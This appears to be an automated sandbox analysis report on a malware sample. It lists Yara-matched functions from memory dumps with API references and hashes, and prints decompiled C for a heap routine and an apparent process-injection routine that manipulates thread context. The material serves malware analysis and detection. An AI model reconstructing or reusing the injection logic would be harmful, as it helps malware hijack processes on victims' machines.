Instruction Fuzzy Hash: D9F0F4B2200208ABCB04DF89CC80EEB77ADAF8C754F018248FA0D97241CA30E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00409B40, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2

Memory Dump Source

Source File: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 95fb8e7be991e7a3834cfd23532fdb6265e305c358471754a12ee14398f87ec4
Instruction ID: 0a1b536bba40c6b6fce4d7236943077e65422b21d4ad40dbaff7467f6c4f6708
Opcode Fuzzy Hash: 95fb8e7be991e7a3834cfd23532fdb6265e305c358471754a12ee14398f87ec4
Instruction Fuzzy Hash: 370152B5D0010DB7DF10DAA1EC42FDEB378AB54318F0041A6E908A7281F634EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004185E0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D

Memory Dump Source

Source File: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 36c6eae92b8005ba539885d914b12f5379157c135ee825ad128bd076db7cd32f
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 24F0B2B2204208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004187C0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9

Memory Dump Source

Source File: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 15e9253bdc6667238a85ff9da65bd6f3d3aad2e55959b4b07e7d113ae3ba9bea
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 6CF015B2200209ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F910CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004187C2, Relevance: 1.5, APIs: 1, Instructions: 29memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9

Memory Dump Source

Source File: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: d141e42af92490f050884ded5524d08a377f3f87b9f48313ece682e970784e27
Instruction ID: f6e690475ae93a959fdc8485af364064d5dcee13894a993032aafcde413755c4
Opcode Fuzzy Hash: d141e42af92490f050884ded5524d08a377f3f87b9f48313ece682e970784e27
Instruction Fuzzy Hash: 42F015B2200109AFDB14DF89CC80EEB77A9AF88354F118249FA0897241C630E911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00418710, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735

Memory Dump Source

Source File: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: bce2094732f0dc6043ed148681cd5d29f2b757d64a263796670ac5fc8daf7d12
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 27D01776200214BBE710EB99CC89EE77BACEF48760F154499FA189B242C930FA40C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 018399A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018399AA

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aa4794226abe8d5655c82d7d3e2fa2d1df447851fc6b56ab7c47513d29733143
Instruction ID: ead18b01a7b3980e6611f3be605d72b0fba5e4ee7b23dab6cd52210e3eed9f32
Opcode Fuzzy Hash: aa4794226abe8d5655c82d7d3e2fa2d1df447851fc6b56ab7c47513d29733143
Instruction Fuzzy Hash: 699002A134100843D10061994414B060005E7F1341F51C115E20586A4DCA5DCD56716A

Uniqueness

Uniqueness Score: -1.00%

Function 018395D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018395DA

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dabb73d27d5ea6caabce6bf3f7f81e162848796e661f26a706318b00c5d14b58
Instruction ID: 3c78afd50b8da1e65df2a9852c0aa0612f6764dbcdc9d1f33ee59adc15b43532
Opcode Fuzzy Hash: dabb73d27d5ea6caabce6bf3f7f81e162848796e661f26a706318b00c5d14b58
Instruction Fuzzy Hash: EF9002A130200403410571994414616400AA7F0341B51C121E20086E0DC96989957169

Uniqueness

Uniqueness Score: -1.00%

Function 01839910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0183991A

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 725eacc01ed5bece8c4e6f27e6cdbe9a2c611168291f960e8522bb83fe0c0bc1
Instruction ID: b90cc5ccd771599951f977cc14611da12eef0b6be7ee2a64908b64d09b2df888
Opcode Fuzzy Hash: 725eacc01ed5bece8c4e6f27e6cdbe9a2c611168291f960e8522bb83fe0c0bc1
Instruction Fuzzy Hash: 509002B130100803D140719944047460005A7E0341F51C111A60586A4ECA9D8ED976A9

Uniqueness

Uniqueness Score: -1.00%

Function 01839540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0183954A

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fe6dec1d6f9311c8fd098f8c3c6bb8684659a6ecfd13da6fe7479c7e0de7d7b9
Instruction ID: 2fe90aded7717161675f7fc16e792a006d87a76d84f3d0ba1e57ee96313d48ac
Opcode Fuzzy Hash: fe6dec1d6f9311c8fd098f8c3c6bb8684659a6ecfd13da6fe7479c7e0de7d7b9
Instruction Fuzzy Hash: 55900265311004030105A59907045070046A7E5391351C121F20096A0CDA6589656165

Uniqueness

Uniqueness Score: -1.00%

Function 018398F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018398FA

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 71c252129c26db3921a8b495b5fafeb188c39e4db858089e087a9386625df27f
Instruction ID: bcf3880e8b1c8980f1a35d875258e8e756350855d17a650711eb46fb2601cae8
Opcode Fuzzy Hash: 71c252129c26db3921a8b495b5fafeb188c39e4db858089e087a9386625df27f
Instruction Fuzzy Hash: EF90026170100903D10171994404616000AA7E0381F91C122A20186A5ECE698A96B175

Uniqueness

Uniqueness Score: -1.00%

Function 01839840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0183984A

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 575cf6df535a6f22e377c9c781bd258248db46c52c7f299cffa5b027001a50ba
Instruction ID: 516c6ecdfa565e3f571c8edfb0fc21610df0623858d79aee16655497b5d82a26
Opcode Fuzzy Hash: 575cf6df535a6f22e377c9c781bd258248db46c52c7f299cffa5b027001a50ba
Instruction Fuzzy Hash: DF900261342045535545B19944045074006B7F0381791C112A2408AA0CC96A995AE665

Uniqueness

Uniqueness Score: -1.00%

Function 01839860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0183986A

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3d2edc8359ed68342179bbab487c388195eb894916323760c25729ee5b9b5777
Instruction ID: 8a10401fbef2dcceb5357a23f7f56a5b75a0cc39ba0ea168a4de46eae30dc5f4
Opcode Fuzzy Hash: 3d2edc8359ed68342179bbab487c388195eb894916323760c25729ee5b9b5777
Instruction Fuzzy Hash: 2690027130100813D111619945047070009A7E0381F91C512A14186A8DDA9A8A56B165

Uniqueness

Uniqueness Score: -1.00%

Function 01839780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0183978A

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efe25e509299465b0bcacabb26d69e03de53d4c12cbb69ba5c62e89eb7a81d20
Instruction ID: 7c93cb94f8519988f28ec55c0dd5de784df0cda3be717025e638c93c570458c3
Opcode Fuzzy Hash: efe25e509299465b0bcacabb26d69e03de53d4c12cbb69ba5c62e89eb7a81d20
Instruction Fuzzy Hash: 3690026931300403D1807199540860A0005A7E1342F91D515A10096A8CCD59896D6365

Uniqueness

Uniqueness Score: -1.00%

Function 018397A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018397AA

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cb7be7fdc087ededb1f4d98416feed21b57d4ea94c657cd6f8b7c5aa001d157a
Instruction ID: 118bfb77c74299525229216edf72643e45dcafb71e8c19445e7bd9fd17151b5c
Opcode Fuzzy Hash: cb7be7fdc087ededb1f4d98416feed21b57d4ea94c657cd6f8b7c5aa001d157a
Instruction Fuzzy Hash: 3A90026130100403D140719954186064005F7F1341F51D111E14086A4CDD59895A6266

Uniqueness

Uniqueness Score: -1.00%

Function 01839FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01839FEA

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a28b66446c5baaf77f4932ab3df81990ed9be940df3f889892ab1dfb7e219992
Instruction ID: b60aa379d8b973d5a7bacb603a39410faa5d5c331d1c96bafd2ce94cca023d5f
Opcode Fuzzy Hash: a28b66446c5baaf77f4932ab3df81990ed9be940df3f889892ab1dfb7e219992
Instruction Fuzzy Hash: 9C90027131114803D110619984047060005A7E1341F51C511A18186A8DCAD989957166

Uniqueness

Uniqueness Score: -1.00%

Function 01839710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0183971A

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 87feda8408cd0f93e2297d4e26df15975f457d3b9da2b238d28996fbe2f72ab3
Instruction ID: 9ecbdcc15cc502441ec96d2d164f5762b8fa860149451a49a57d086015252dc8
Opcode Fuzzy Hash: 87feda8408cd0f93e2297d4e26df15975f457d3b9da2b238d28996fbe2f72ab3
Instruction Fuzzy Hash: 4E90027130100803D10065D954086460005A7F0341F51D111A60186A5ECAA989957175

Uniqueness

Uniqueness Score: -1.00%

Function 018396E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018396EA

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f2af22565dd9d911e758b5c497d1c6aebf85e9ee18bb83c51a42c20f62d77126
Instruction ID: fd116ea48e7bab02a5eaa74a8e0015e0568a0117b8604a8ab25896620ab04412
Opcode Fuzzy Hash: f2af22565dd9d911e758b5c497d1c6aebf85e9ee18bb83c51a42c20f62d77126
Instruction Fuzzy Hash: 9990027130108C03D1106199840474A0005A7E0341F55C511A54187A8DCAD989957165

Uniqueness

Uniqueness Score: -1.00%

Function 01839A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01839A0A

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f104741627c6a8189a4b5c8a5178cb157e98b4ab840d2f285eab74ae29637d7a
Instruction ID: 19fffea348a7383d5cd8157db84b6a46a36bd5cc770bbe5392345694676d80ca
Opcode Fuzzy Hash: f104741627c6a8189a4b5c8a5178cb157e98b4ab840d2f285eab74ae29637d7a
Instruction Fuzzy Hash: A690027130140803D1006199481470B0005A7E0342F51C111A21586A5DCA69895575B5

Uniqueness

Uniqueness Score: -1.00%

Function 01839A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01839A2A

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cd6f97a3c606e0ea7c1ac54a5a7190bc1427657b68876d8cc86b93ab5923fa72
Instruction ID: d11795234db2d8bba50b1fe1650a075dbcd098be845651674850df41e197953d
Opcode Fuzzy Hash: cd6f97a3c606e0ea7c1ac54a5a7190bc1427657b68876d8cc86b93ab5923fa72
Instruction Fuzzy Hash: 1190026170100443414071A988449064005BBF1351751C221A198C6A0DC99D896966A9

Uniqueness

Uniqueness Score: -1.00%

Function 01839A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01839A5A

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2aef1d27423b3f6e1ca337a958c2e9520d00aaa623e67956af1637dd6363c247
Instruction ID: 9df2c49048abce41db5a8a016b3401079847a00bafd4db8a4d32b44a9c577325
Opcode Fuzzy Hash: 2aef1d27423b3f6e1ca337a958c2e9520d00aaa623e67956af1637dd6363c247
Instruction Fuzzy Hash: 3890026131180443D20065A94C14B070005A7E0343F51C215A11486A4CCD5989656565

Uniqueness

Uniqueness Score: -1.00%

Function 01839660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0183966A

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5166a38476b5ec85dd2e7a328eeee788de59511b69358066b4dafd35e20b0646
Instruction ID: 1f37363c47d3c55afb42819842b2e1b33dda3484669a876c24cca0ddcfaa8ae4
Opcode Fuzzy Hash: 5166a38476b5ec85dd2e7a328eeee788de59511b69358066b4dafd35e20b0646
Instruction Fuzzy Hash: 2990027130100C03D1807199440464A0005A7E1341F91C115A10197A4DCE598B5D77E5

Uniqueness

Uniqueness Score: -1.00%

Function 004088D0, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1efa2f8376c553138144e7bf52808227de5cb7bb2b62794fcf5c230629b4f76a
Instruction ID: 9418915e7eeb477e5e2ec2766e2aaec59ae9dbf4e141e057a09900a59a4d4d67
Opcode Fuzzy Hash: 1efa2f8376c553138144e7bf52808227de5cb7bb2b62794fcf5c230629b4f76a
Instruction Fuzzy Hash: 8321FBB2C4420957CB15E6649E42BFF737C9B50304F04057FE989A3181FA39AB4987A6

Uniqueness

Uniqueness Score: -1.00%

Function 004188B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004188B0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191E0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413536
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}

0x004188c7
0x004188d2
0x004188dd
0x004188e1

APIs

RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD

Strings

65A, xrefs: 004188D2, 004188DC

Memory Dump Source

Source File: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: 65A
API String ID: 1279760036-2085483392
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 6af236cfb772a66706e6e9b9d52e602bd21d3a4cd2a65313634d6b12f98b32f7
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: BDE012B1200208ABDB14EF99CC45EA777ACAF88654F118559FA085B242CA30F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00407710, Relevance: 1.7, APIs: 1, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00407710(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				char* _v8;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v68;
				char _v76;
				char _v80;
				char _v84;
				char _v92;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v648;
				char _v832;
				char _v836;
				char _v1096;
				char _v1616;
				char _v1644;
				char _v1652;
				void* _t71;
				void* _t78;
				void* _t81;
				intOrPtr _t82;
				intOrPtr _t87;
				void* _t90;
				char* _t96;
				void* _t98;
				intOrPtr _t99;
				intOrPtr _t107;
				intOrPtr _t113;
				intOrPtr _t115;
				char _t116;
				void* _t119;
				intOrPtr _t132;
				intOrPtr* _t150;
				intOrPtr _t152;
				void* _t153;
				void* _t154;
				void* _t155;
				void* _t156;
				void* _t158;

				_t152 = _a4;
				_t116 = 0; // executed
				_t71 = E00406E20(_t152,  &_v24); // executed
				_t154 = _t153 + 8;
				if(_t71 == 0) {
					L20:
					return _t116;
				}
				E00407030( &_v24,  &_v1652);
				_t150 = _a8;
				_t155 = _t154 + 8;
				do {
					E0041A100( &_v1096, 0x104);
					E0041A770( &_v1096,  &_v1616);
					_t78 = E00413DF0(0x19996921,  &_v1096);
					_t156 = _t155 + 0x18;
					if(_t78 == 0) {
						L17:
						if(_t116 != 0) {
							break;
						}
						goto L18;
					}
					_t82 = _a16;
					if(_t82 != 0x1d) {
						__eflags = _t82 - 0x1e;
						if(_t82 == 0x1e) {
							_push( &_v1652);
							_push(_t152);
							E00405EA0();
							_t156 = _t156 + 8;
						}
						goto L17;
					}
					_t116 = 0;
					_v836 = 0;
					E0041A150( &_v832, 0, 0x328);
					_v92 = _v1644;
					_v832 = 0x10007;
					_v48 = 0x18;
					_v44 = 0;
					_v36 = 0;
					_v40 = 0;
					_v32 = 0;
					_v28 = 0;
					_v116 = 0x438;
					_t87 = E00417F90(_t152,  &_v80, 0x438,  &_v48,  &_v92);
					_t156 = _t156 + 0x20;
					_v104 = _t87;
					if(_t87 < 0) {
						goto L18;
					}
					if( *((intOrPtr*)(_t152 + 0x1c)) == 0) {
						L10:
						E004070A0( &_v24,  &_v76);
						_t90 = E0040D350(_t152,  &_v84, _v68);
						_t158 = _t156 + 0x14;
						__eflags = _t90;
						if(_t90 != 0) {
							_t119 = 2 -  *((intOrPtr*)(_t152 + 4)) + E004199B0();
							_v8 =  *((intOrPtr*)(_t150 + 0x10)) + 2;
							E00418010(_t152, _v84,  &_v832);
							_t96 = _v8;
							 *_t96 = 0x68;
							 *((intOrPtr*)(_t96 + 1)) = _v648;
							_t98 = E0040A910(_t152,  &_v80, _t150,  *((intOrPtr*)(_t150 + 0x10)), 2);
							_t156 = _t158 + 0x20;
							__eflags = _t98;
							if(__eflags != 0) {
								_t99 = _t98 -  *_t150;
								_v112 = _t99;
								_v648 = _t119 + _t99;
								E00418040(_t152, _v84,  &_v832);
								_v104 = E004180D0(_t152, _v84, _v648 + 5, 0, 0, 0);
								E004180A0(_t152, _v84, 0);
								E00418710(_t152, _v84);
								_push(0x32);
								_t107 = E00407310(__eflags, _t152, _t150, _a12,  &_v836);
								_t156 = _t156 + 0x4c;
								_t116 = _t107;
								goto L17;
							}
							_t116 = 0;
							goto L18;
						}
						E00418710(_t152, _v80);
						_t156 = _t158 + 8;
						goto L18;
					}
					E00418180(_t152, _v80, 0x1a,  &_v836, 4, 0); // executed
					_t156 = _t156 + 0x18;
					if(_v836 != 0) {
						goto L10;
					}
					_t113 = E0040A910(_t152,  &_v80, _t150,  *((intOrPtr*)(_t150 + 0x10)), 6); // executed
					_t132 =  *((intOrPtr*)(_t150 + 0x1c));
					_t156 = _t156 + 0x14;
					_v108 = _t113;
					_v112 = _t132;
					if(_t113 != 0 && _t132 != 0) {
						_t115 = E00407540(_t152, _t150, _a12,  &_v836,  &_v1652,  &_v24); // executed
						_t156 = _t156 + 0x18;
						_t116 = _t115;
						goto L17;
					}
					L18:
					_t81 = E00407060( &_v24,  &_v1652);
					_t155 = _t156 + 8;
				} while (_t81 != 0);
				E004070E0(_t152,  &_v24); // executed
				goto L20;
			}

0x0040771b
0x00407723
0x00407725
0x0040772a
0x0040772f
0x004079be
0x004079c4
0x004079c4
0x00407741
0x00407746
0x00407749
0x00407750
0x0040775c
0x0040776f
0x00407780
0x00407785
0x0040778a
0x00407990
0x00407992
0x00000000
0x00000000
0x00000000
0x00407992
0x00407790
0x00407796
0x0040797b
0x0040797e
0x00407986
0x00407987
0x00407988
0x0040798d
0x0040798d
0x00000000
0x0040797e
0x0040779c
0x004077ab
0x004077b1
0x004077c4
0x004077d1
0x004077db
0x004077e2
0x004077e5
0x004077e8
0x004077eb
0x004077ee
0x004077f1
0x004077f8
0x004077fd
0x00407800
0x00407805
0x00000000
0x00000000
0x0040780e
0x00407885
0x0040788d
0x0040789b
0x004078a0
0x004078a3
0x004078a5
0x004078cc
0x004078d3
0x004078dc
0x004078e1
0x004078e4
0x004078ed
0x004078fc
0x00407901
0x00407904
0x00407906
0x0040790f
0x0040791f
0x00407922
0x00407928
0x0040794e
0x00407951
0x0040795b
0x00407963
0x0040796f
0x00407974
0x00407977
0x00000000
0x00407977
0x00407908
0x00000000
0x00407908
0x004078ac
0x004078b1
0x00000000
0x004078b1
0x00407821
0x00407826
0x0040782f
0x00000000
0x00000000
0x0040783d
0x00407842
0x00407845
0x00407848
0x0040784b
0x00407850
0x00407876
0x0040787b
0x0040787e
0x00000000
0x0040787e
0x00407994
0x0040799f
0x004079a4
0x004079a7
0x004079b4
0x00000000

APIs

GetFirmwareEnvironmentVariableExW.KERNEL32 ref: 004078B9

Memory Dump Source

Source File: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnvironmentFirmwareVariable
String ID:
API String ID: 3150624800-0
Opcode ID: 9eb11ce653b690504b136500d03f0016dabdf673771d0919d0fa9ab1090df958
Instruction ID: 64abb0b8603356ff573f994ce21d33f4ed816357299a708e3cadde4571a09c34
Opcode Fuzzy Hash: 9eb11ce653b690504b136500d03f0016dabdf673771d0919d0fa9ab1090df958
Instruction Fuzzy Hash: E78141B1D00219ABEB14DF95CC81EEF77BCAF44304F04456EF608A7241E7786A55CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00407280, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA

Memory Dump Source

Source File: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 103af01fa6ced0b1bf26eae8f883133b32587eddec92ce106ebb367855adc8e1
Instruction ID: edd922925c6209f8b0e98cfad68b07b84000b97510acc14bd219e9c7142b933f
Opcode Fuzzy Hash: 103af01fa6ced0b1bf26eae8f883133b32587eddec92ce106ebb367855adc8e1
Instruction Fuzzy Hash: DB01F731A8032877E720A6959C03FFF772C5B00B55F04006EFF04BA1C2E6A8790642FA

Uniqueness

Uniqueness Score: -1.00%

Function 00418922, Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D

Memory Dump Source

Source File: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: a653cd2de2404513f09ce9162d2afa26f5595cfd4e006bb174b6c19aa3b3dc8f
Instruction ID: 33714646f1d1bb2e54db7283e240e62c371420941733a65a93fdea15ca9d51fe
Opcode Fuzzy Hash: a653cd2de2404513f09ce9162d2afa26f5595cfd4e006bb174b6c19aa3b3dc8f
Instruction Fuzzy Hash: 25F085B12042097BCB18DF58CC49EEB3769BF88750F108059FD089B282DA30E941CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 004188E2, Relevance: 1.5, APIs: 1, Instructions: 27memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D

Memory Dump Source

Source File: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 783c375c10af107dedab5bf5bf967814157e58bc7e1e1eaaaaf508fd879477a3
Instruction ID: 2ecd89270ed87ab76e663e557be8bb9c59ba18ea85902ba56f3ef0b0c7104c8d
Opcode Fuzzy Hash: 783c375c10af107dedab5bf5bf967814157e58bc7e1e1eaaaaf508fd879477a3
Instruction Fuzzy Hash: 85E0EDBA200200BFC718DF98CC45EA77368EF88350F004549F9289B352C230E904CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 004188F0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D

Memory Dump Source

Source File: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
